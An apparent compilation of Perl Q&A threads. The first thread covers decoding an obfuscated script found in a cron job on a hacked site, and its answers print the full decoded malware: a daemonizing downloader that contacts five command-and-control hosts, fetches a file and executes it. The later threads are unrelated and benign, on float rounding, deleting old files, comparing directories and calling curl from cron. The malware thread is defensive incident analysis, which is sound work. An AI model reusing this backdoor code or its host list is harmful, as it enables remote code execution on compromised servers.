I was cleaning out a client's site that got hacked after I had cleaned it once already, when I found a cron job pointing to a script in the server /tmp directory:
https://pastebin.com/uXCSXxdn
The first 6 lines look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;eval($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
M"G-U8B!M86EN"GL*97AI="`P('5N;&5S<R!D969I;F5D("AM>2`D<&ED(#T#
The rest is just 121 more lines of that DATA block. I ran the file through Virustotal and it came back clean, but I am certain this is not a non-malicious file. Is there any way to safely decrypt it so I know where to look and see if it dropped another payload somewhere on the site?
If you want to see the deobfuscated code, here are the steps to do it. Note that what you will be doing is dangerous, because if you accidentally execute the code, your machine will be attacked. You are warned.
Note that these steps are for THIS EXAMPLE only. Other attack scripts may have other things in them. They may need other changes than what is detailed below.
Here are the steps for the original example that was posted.
Copy all of your program into original.pl. It will look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;print($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
Change the eval on the first line to print. IF YOU DON'T CHANGE THE eval TO print, THEN THE NEXT STEP WILL PERFORM THE ATTACK ON YOUR MACHINE.
Now, run the program, after you have changed the eval to print.
perl original.pl > unencoded.pl
The new unencoded.pl program will look like this, with no indentation:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
Now use the B::Deparse module to interpret and reformat the program. MAKE SURE YOU HAVE -MO=Deparse OR ELSE YOU WILL RUN THE ATTACK.
perl -MO=Deparse unencoded.pl > formatted.pl # Note the -MO=Deparse!!!
Running through the Deparse module will say:
unencoded.pl syntax OK
The new formatted.pl program will be a nicely formatted copy of the attacker's payload, 213 lines long, and you can examine what the script does. Note that the final program is still dangerous, because it is the attack program that the attacker wanted to run.
The format shown is simply uuencoding. I copied the pastebin-ed text, pasted it into https://www.browserling.com/tools/uudecode, which showed it's this not-actually-obfuscated Perl code:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","ixjeunsdms.org:80","95.216.98.49:443","heyhajksds.com:443","skjfdnlakdp.net:80"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", #$rnd[map {rand #$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (#$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $content;
}
exit 0 if !defined $command || $command !~ /^16$/;
$header = "$dir/" . time; $content = "$dir/$file";
unlink $header if -f $header; unlink $content if -f $content;
&http($link, $timeout, $header, $content, 1);
my ($resp, $size) = ("000", 0);
if (open (F, "<", $header))
{
flock F, 1;
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
}
close F;
}
$size = (stat $content)[7] if -f $content;
$size = 0 if !defined $size || $size !~ /^\d+$/;
if ($size > 0)
{
chmod 0755, $content;
system "perl $content >/dev/null 2>&1";
}
unlink $header if -f $header; unlink $content if -f $content;
foreach my $rs (#$url)
{
$header = "/dev/null"; $content = $header;
&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
}
exit 0;
}
sub xorl
{
my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
foreach my $chr (split (//, $line))
{
if ($xor == $lim)
{
$lim = 0 if $lim == 256;
$lim += 16;
$xor = 1;
}
$code .= pack ("C", unpack ("C", $chr) ^ $xor);
$xor ++;
}
return $code;
}
sub decxd
{
my $data = pack ("H*", shift);
#_ = unpack ("C5", substr ($data, 0, 5, ""));
return (&xorl(substr ($data, 0, shift, "")), &xorl(substr ($data, 0, shift, "")), #_);
}
sub http
{
my ($url, $timeout, $header, $content, $mode, $gecko) = #_;
$gecko = "20100101" if !defined $gecko || !length $gecko;
my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
return unless $host;
my $addr = gethostbyname $host;
return unless $addr;
$port ||= 80;
$path ||= "/";
$addr = sockaddr_in($port, $addr);
my $readers = IO::Select->new() or return;
my $writers = IO::Select->new() or return;
my $buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.1",
"Host: $host",
"Cookie: PHPSESSID=295c445c5f495f5f4548533c3c3c3d29",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/$gecko Firefox/60.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.1",
"Accept-Language: en-us,en;q=0.8",
"Accept-Encoding: gzip, deflate",
"Accept-Charset: ISO-8859-1,utf-8;q=0.1,*;q=0.8",
"Connection: close",
"\x0D\x0A"
);
if ($mode)
{
$buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.0",
"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/$gecko Firefox/61.0",
"Accept: text/html,*/*",
"Connection: close",
"\x0D\x0A"
);
}
my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
return unless $socket;
$socket->blocking(0);
unless ($socket->connect($addr))
{
unless ($! == POSIX::EINPROGRESS)
{
close $socket;
return;
}
}
$writers->add($socket);
$timeout += time;
my $step = 0;
while (1)
{
IO::Select->select(undef, undef, undef, 0.02);
my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
foreach my $handle (#$writable)
{
if ($step == 0)
{
$step = 1 if $handle->connected;
}
if ($step == 1)
{
my $result = syswrite ($handle, $buffer);
if (defined $result && $result > 0)
{
substr ($buffer, 0, $result) = "";
if (!length $buffer)
{
$readers->add($handle);
$writers->remove($handle);
$step = 2;
}
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
}
my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
foreach my $handle (#$readable)
{
next if $step < 2;
my $result;
if ($step == 2)
{
$result = sysread ($handle, $buffer, 8192, length $buffer);
}
else
{
$result = sysread ($handle, $buffer, 8192);
}
if (16384 < length $buffer)
{
$timeout = 0;
}
elsif (defined $result)
{
if ($result > 0)
{
if ($step == 2)
{
my $offset = index ($buffer, "\x0D\x0A\x0D\x0A");
next if $offset < 0;
if (open (F, ">>", $header))
{
flock F, 2;
binmode F;
print F substr ($buffer, 0, $offset);
close F;
}
substr ($buffer, 0, $offset + 4) = "";
$step = 3;
}
if ($step == 3)
{
if (length $buffer)
{
$buffer =~ s/%EHLO_VALUE%/295c445c5f495f5f4548533c3c3c3d29/gs;
if (open (F, ">>", $content))
{
flock F, 2;
binmode F;
print F $buffer;
close F;
}
$buffer = "";
}
}
next;
}
$timeout = 0;
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
if ($timeout < time)
{
foreach my $handle ($writers->handles, $readers->handles)
{
$writers->remove($handle) if $writers->exists($handle);
$readers->remove($handle) if $readers->exists($handle);
close $handle;
}
return;
}
}
}
The clues were a) recognising the distinctive format; b) also recognising the unpack('u*'). No machines, virtual or otherwise, were put at risk in this process.
The code has 5 URLs, and the http function implies it "phones home" to those, getting commands to execute in a Set-Cookie: PHPSESSIONID= header. I haven't analysed it further than that.
Replace eval with print to see what the script is running. The portion you provided generates readable code.
My first thought was to deparse it but that won't be of much use since most of the code is in the DATA block. You could replace the eval() function with print() and let the script decode it for you. You might end up needing deparse for what print gives you.
I am using the following Perl script to write out a shell script:
#!/usr/bin/perl -w
$incr=0.1;
$dist=5.1;
my $filename = 'job-1.sh';
open (my $BATCHFILE, '>', "$filename");
while ($dist <= 15) {
print $BATCHFILE
"
YOYO -O -i min_mdin.$dist
";
$dist += $incr;
}
close ($BATCHFILE);
The job-1.sh file should contain the following lines:
YOYO -O -i min_mdin.5.1
YOYO -O -i min_mdin.5.2
……
YOYO -O -i min_mdin.15
However, some files are printed as follows:
YOYO -O -i min_mdin.6.49999999999999
YOYO -O -i min_mdin.6.59999999999999
This problem occurs only when the increment is 0.1. An increment of 0.2 or 0.25 do not give this error.
Here's what's happening:
https://floating-point-gui.de
As a quick fix try something like this:
#!/usr/bin/perl -w
$incr=1;
$dist=51;
while ($dist <= 150)
{
print $dist/10 . "\n";
$dist += $incr;
}
Or this:
#!/usr/bin/perl -w
$incr = 0.1;
$dist = 5.1;
while ($dist <= 15)
{
print sprintf("%.2f",$dist) . "\n";
$dist = $dist + $incr;
}
I am trying to make a script which will delete files older than a year.
This is my code:
#!/usr/bin/perl
$files = ".dat|.exe";
#file_del = split('\|',$files);
print "#file_del";
$dates = "365|365|365|365";
#date_del = split('\|',$dates);
if($#date_del == 0){
for $i (#file_del){
my $f = `find \"/Users/ABC/Desktop/mydata\" -name *$i -mtime +date[0]`;
print "$f";
}
}
else{
for $i (0..$#file_del){
my $f = `find \"/Users/ABC/Desktop/mydata\" -name *$file_del[$i] -mtime +$date_del[$i]`;
print "$f";
}
}
Issues I am facing:
It is not detecting .txt files, otherwise .data,.exe,.dat etc it is detecting.
Also -mtime is 365. But a leap year(366 days) I have to change my script.
$myDir = "/Users/ABC/Desktop/mydata/";
$cleanupDays = 365
$currentMonth = (localtime)[4] + 1;
$currentyear = (localtime)[5] + 1900;
if ($currentMonth < 3) {
$currentyear -= 1;
}
if( 0 == $currentyear % 4 and 0 != $currentyear % 100 or 0 == $currentyear % 400 ) {
$cleanupDays += 1;
}
$nbFiles = 0;
$runDay = (time - $^T)/86400; # Number of days script is running
opendir FH_DIR, $myDir
or die "$0 - ERROR directory '$myDir' doesn't exist\n");
foreach $fileName (grep !/^\./, (readdir FH_DIR)) {
if (((-M "$myDir$fileName") + $runDay) > $cleanupDays) {
unlink "$myDir$fileName" or print "ERROR:NOT deleted:$fileName ";
$nbFiles++;
}
}
closedir FH_DIR;
print "$nbFiles files deleted\n";
Use the brilliant Path::Class to make life easy:
use Modern::Perl;
use Path::Class;
my $dir = dir( '/Users', 'ABC', 'Desktop', 'mydata' );
$dir->traverse( sub {
my ( $child, $cont ) = #_;
if ( not $child->is_dir and $child->stat ) {
if ( $child->stat->ctime < ( time - 365 * 86400 ) ) {
say "$child: " .localtime( $child->stat->ctime );
# to delete:
# unlink $child;
}
}
return $cont->();
} );
You can also use the command find2perl. Like:
find2perl . -mtime -365 -exec rm {} \;
What will produce a perl script to use the File::Find - e.g.:
use strict;
use File::Find ();
use vars qw/*name *dir *prune/;
*name = *File::Find::name;
*dir = *File::Find::dir;
*prune = *File::Find::prune;
sub wanted;
File::Find::find({wanted => \&wanted}, '.');
exit;
sub wanted {
my ($dev,$ino,$mode,$nlink,$uid,$gid);
(($dev,$ino,$mode,$nlink,$uid,$gid) = lstat($_)) &&
(int(-M _) < 365) &&
(unlink($_) || warn "$name: $!\n");
}
Need to compare two directories and check through every file in both directories for files of the same name, if the same name occurs you check to see if the files have the same content, if so print > file <. If the file has the same name but not the same content < file > If there is a file that's not in directory 2 but in directory 1 <<< file1, and likewise >>> file2 for a file in dir 2 but not dir 1.
I have been having trouble, my code doesn't even compare when I test to see if the files are equal in name.
#!/usr/bin/perl -w
use File::Basename;
#files1 = `/usr/bin/find $ARGV[0] -print`;
chop #files1;
#files2 = `/usr/bin/find $ARGV[1] -print`;
chop #files2;
here:
for ($i=1; #files1 >= $i; $i++) {
for ($x=1; #files2 >= $x; $x++) {
$file1 = basename($files1[$i]);
$file2 = basename($files2[$x]);
if ($file1 eq $file2) {
shift #files1;
shift #files2;
$result = `/usr/bin/diff -q $files1[$i] $files2[$x]`;
chop $result;
if ($result eq "Files $files1[$i] and $files2[$x] differ") {
print "< $file1 >\n";
next here;
}
else {
print "> $file1 <\n";
}
}
else {
if ( !-e "$files1[$i]/$file2") { print ">>> $file2\n";}
unless ( -e "$files2[$x]/$file1") { print "<<< $file1\n";}
}
}
}
Try using this :
diff -aqr /dir1 /dir2
or :
#!/bin/bash
for f;
for g; do
[[ "$f" != "$g" ]] &&
cmp &>/dev/null "$f" "$g" || echo "$f is different of $g"
done
done
USE this
./script dir1/* dir2/*
I've got a really bizzare problem, I've googled this to death, and cannot for the life of me find an answer. I'm a bit of a newbie to programming (lt 2 years) so sorry if this is something obvious, or I've not provided adequate detail
The Problem is...
curl crashes when I call it for the 5th time in a while loop (when run from root's cron).
curl is fine when I run said while loop manually whilst logged in (about 50 iterations).
I run a bash script from cron
The bash script runs a perl script
The perl script calls curl within a while loop
On the 5th iteration of this while loop, curl is called and crashes (no output)
I'm running cron as root (crontab -u root /path/to/the/crontab/file)
I don't think it's environment based, as it runs fine 4 times
If I end the while loop at 4 itterations and start it again, it still fails, so I figure the problem is not with the while loop.
This exact script works fine on my old server running Ubuntu desktop ( I'm now on Ubuntu server 10.04)
I think this a problem between curl and cron.
The line of the crash looks like this (vars filled in)
$err = system("/usr/bin/curl -f -v -s -r "36155357-36259993,36790101-37194555,53623979-53745261" http://nomads.ncep.noaa.gov/pub/data/nccf/com/gfs/prod/gfs.2012040100/master/gfs.t00z.mastergrb2f21 -o /root/Desktop/getGFS_uploadGFS/GFS/windvect/gfs.t00z.mastergrb2f21.tmp");
I'm totally stumped write now, if anyone has any ideas it would be much appreciated. Below is the while loop (with the crash point highlighted near the bottom).
while ($fhr <= $hr1) {
if ($fhr <= 9) { $fhr="0$fhr"; }
$url = $URL;
$url =~ s/\$FHR/$fhr/g;
$url =~ s/\${FHR}/$fhr/g;
$file = $url;
$file =~ s/^.*\///;
#
# read the inventory
# $line[] = wgrib inventory, $start[] = start of record (column two of $line[])
#
if ($windows eq 'yes') {
$err = system("$curl -f -s $url$inv -o $OUTDIR/$file.tmp");
$err = $err >> 8;
if ($err) {
print STDERR "error code=$err, problem reading $url$inv\n";
sleep(10);
exit(8);
}
open (In, "$OUTDIR/$file.tmp");
}
else {
open (In, "$curl -f -s $url$inv |");
}
$n=0;
while (<In>) {
chomp;
$line[$n] = $_;
s/^[^:]*://;
s/:.*//;
$start[$n] = $_;
$n++;
}
close(In);
if ($n == 0) {
print STDERR "Problem reading file $url$inv\n";
sleep(10);
exit(8);
}
#
# find end of record: $last[]
#
$lastnum = $start[$n-1];
for ($i = 0; $i < $n; $i++) {
$num = $start[$i];
if ($num < $lastnum) {
$j = $i + 1;
while ($start[$j] == $num) { $j++; }
$last[$i] = $start[$j] - 1;
}
else {
$last[$i] = '';
}
}
if ($action eq 'inv') {
for ($i = 0; $i < $n; $i++) {
print "$line[$i]:range=$start[$i]-$last[$i]\n";
}
exit(0);
}
#
# make the range field for Curl
#
$range = '';
$lastfrom = '';
$lastto = '-100';
for ($i = 0; $i < $n; $i++) {
$_ = $line[$i];
if (/$LEVS/i && /$VARS/i) {
$from=$start[$i];
$to=$last[$i];
if ($lastto + 1 == $from) {
$lastto = $to;
}
elsif ($lastto ne $to) {
if ($lastfrom ne '') {
if ($range eq '') { $range = "$lastfrom-$lastto"; }
else { $range = "$range,$lastfrom-$lastto"; }
}
$lastfrom = $from;
$lastto = $to;
}
}
}
if ($lastfrom ne '') {
if ($range eq '') { $range="$lastfrom-$lastto"; }
else { $range="$range,$lastfrom-$lastto"; }
}
if ($range ne '') {
#################################################################################
########### THE BELOW LINE IS WHERE CURL IS CALLED AND IT CRASHES ###############
#################################################################################
$err = system("$curl -f -v -s -r \"$range\" $url$grb -o $OUTDIR/$file.tmp");
$err = $err >> 8;
if ($err != 0) {
print STDERR "error in getting file $err $url$grb\n";
sleep(20);
exit $err;
}
rename "$OUTDIR/$file.tmp", "$OUTDIR/$file";
$output = "$output $OUTDIR/$file";
}
else {
print "no matches (no download) for $file\n";
}
$fhr += $dhr;
}
Why do you want to shell out to curl? If it's just the range, that's easy:
use v5.10.1;
use Mojo::UserAgent;
say Mojo::UserAgent->new->get(
'http://www.example.com',
{ 'Range' => 'bytes=500-600' }
)->res->body;
There are also Perl bindings to libcurl: Net::Curl and WWW::Curl.